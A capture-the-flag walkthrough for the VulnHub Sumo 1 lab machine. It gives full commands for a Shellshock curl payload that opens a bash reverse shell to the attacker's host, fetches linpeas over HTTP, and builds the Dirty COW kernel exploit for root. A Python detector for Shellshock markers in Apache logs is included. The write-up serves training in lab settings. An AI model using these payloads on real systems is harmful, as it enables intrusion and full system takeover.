https://www.vulnhub.com/entry/sumo-1,480/

System Info

  • Ubuntu 12.04 LTS

Discover Target Network

  • sudo nmap -sn 192.168.122.0-255
  • nmap -p- 192.168.122.113

Port 80

  • not much to see on the website, other than that it is running Apache 2.2.22

ShellShock

https://www.sevenlayers.com/index.php/125-exploiting-shellshock

  • use nikto -host 192.168.122.113 to scan for web server vulnerabilities.

  • it shows that /cgi-bin/test, /cgi-bin/test.sh and /cgi-bin/test/test.cgi are vulnerable to Shellshock

  • running:

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.122.101/7741 0>&1' http://192.168.122.113/cgi-bin/test/test.cgi

opens a reverse shell back to the host on TCP port 7741

  • upgrade to a better shell using python2: python -c 'import pty;pty.spawn("/bin/bash")'
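From the defender's side, the probe above leaves a clear trace in Apache's access log: a header value that begins with a bash function definition. The following is an added example (not part of this writeup) that parses combined-format access-log lines and flags requests whose logged User-Agent or Referer carries that marker; the log lines are constructed for the example.

```python
import re

# Apache "combined" access-log format (the default on Ubuntu's Apache 2.2):
# ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shellshock payloads begin a header value with a bash function definition.
# Tolerate the whitespace variations seen in the wild: "() {", "(){", "() {:;};".
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Apache exports client headers to CGI scripts as environment variables, so any
# header can carry the payload; these two are the ones the combined log records.
LOGGED_HEADERS = ("agent", "referer")


def parse_combined(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED_RE.match(line.rstrip("\r\n"))
    return m.groupdict() if m else None


def find_shellshock(lines):
    """Return (client_ip, request_path, header) for each request whose logged
    User-Agent or Referer carries a bash function-definition marker."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:          # malformed or non-combined line: skip it
            continue
        parts = rec["request"].split()
        path = parts[1] if len(parts) >= 2 else rec["request"]
        for header in LOGGED_HEADERS:
            if SHELLSHOCK_RE.search(rec[header]):
                hits.append((rec["ip"], path, header))
                break            # one finding per request is enough
    return hits


# Constructed sample lines (not taken from the target's real access log).
SAMPLE_LOG = [
    '192.168.122.101 - - [01/Jan/2020:10:00:00 +0000] "GET / HTTP/1.1" 200 177 "-" "Mozilla/5.0"',
    '192.168.122.101 - - [01/Jan/2020:10:00:05 +0000] "GET /cgi-bin/test/test.cgi HTTP/1.1" '
    '200 11 "-" "() { :; }; echo probe"',
    '192.168.122.101 - - [01/Jan/2020:10:00:09 +0000] "GET /cgi-bin/test.sh HTTP/1.1" '
    '500 - "(){ :;}; echo probe" "curl/7.68.0"',
    'this line is not in combined format',
]

if __name__ == "__main__":
    for ip, path, header in find_shellshock(SAMPLE_LOG):
        print(f"{ip} sent a Shellshock marker in {header} to {path}")
```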

Privilege Escalation

  • we are a very low-privileged user, and there is not much misconfiguration to see.
  • we can try running enumeration scripts like linpeas.sh, but the target machine doesn't have cURL.
  • download it onto the host machine with wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
  • open a simple HTTP server using python3: python -m http.server 9999
  • on the target machine, cd /tmp, then wget http://192.168.122.101:9999/linpeas.sh && chmod +x linpeas.sh

Dirty COW

  • running it shows that this kernel (3.2.0) is vulnerable to multiple exploits; the CVE we are going to exploit is CVE-2016-5195, which allows local users to gain privileges through incorrect handling of the copy-on-write feature, letting them write to read-only memory mappings. It is known as "Dirty COW".
  • the exploit we are going to use is https://github.com/firefart/dirtycow
  • get it onto the host machine with wget https://github.com/firefart/dirtycow/raw/master/dirty.c
  • it needs to be cross-compiled for the target system or compiled on the target system itself.
  • so get it onto the target machine the same way as linpeas.sh
  • but if we try to compile it with the GNU C compiler on the target system, we get an error like:
Gcc error: gcc: error trying to exec 'cc1': execvp: No such file or directory
  • locate cc1 by find / -name cc1 2> /dev/null
  • add the directory that contains it to the PATH environment variable (PATH holds directories, not binaries, so use the directory rather than the cc1 file itself): export PATH=$PATH:/usr/lib/gcc/x86_64-linux-gnu/4.6
  • now we can compile it using gcc -pthread dirty.c -O2 -o dirty -lcrypt
  • running it prompts us for a password for the new user; enter anything.
  • now we can SSH into the machine with ssh firefart@192.168.122.113
  • even though our username is firefart, running id shows that we are root!

Capture the Flag

  • cat /root/root.txt

Cleaning Up

  • Because the exploit replaced the target system's /etc/passwd file, to clean up we need to restore the backup it made: mv /tmp/passwd.bak /etc/passwd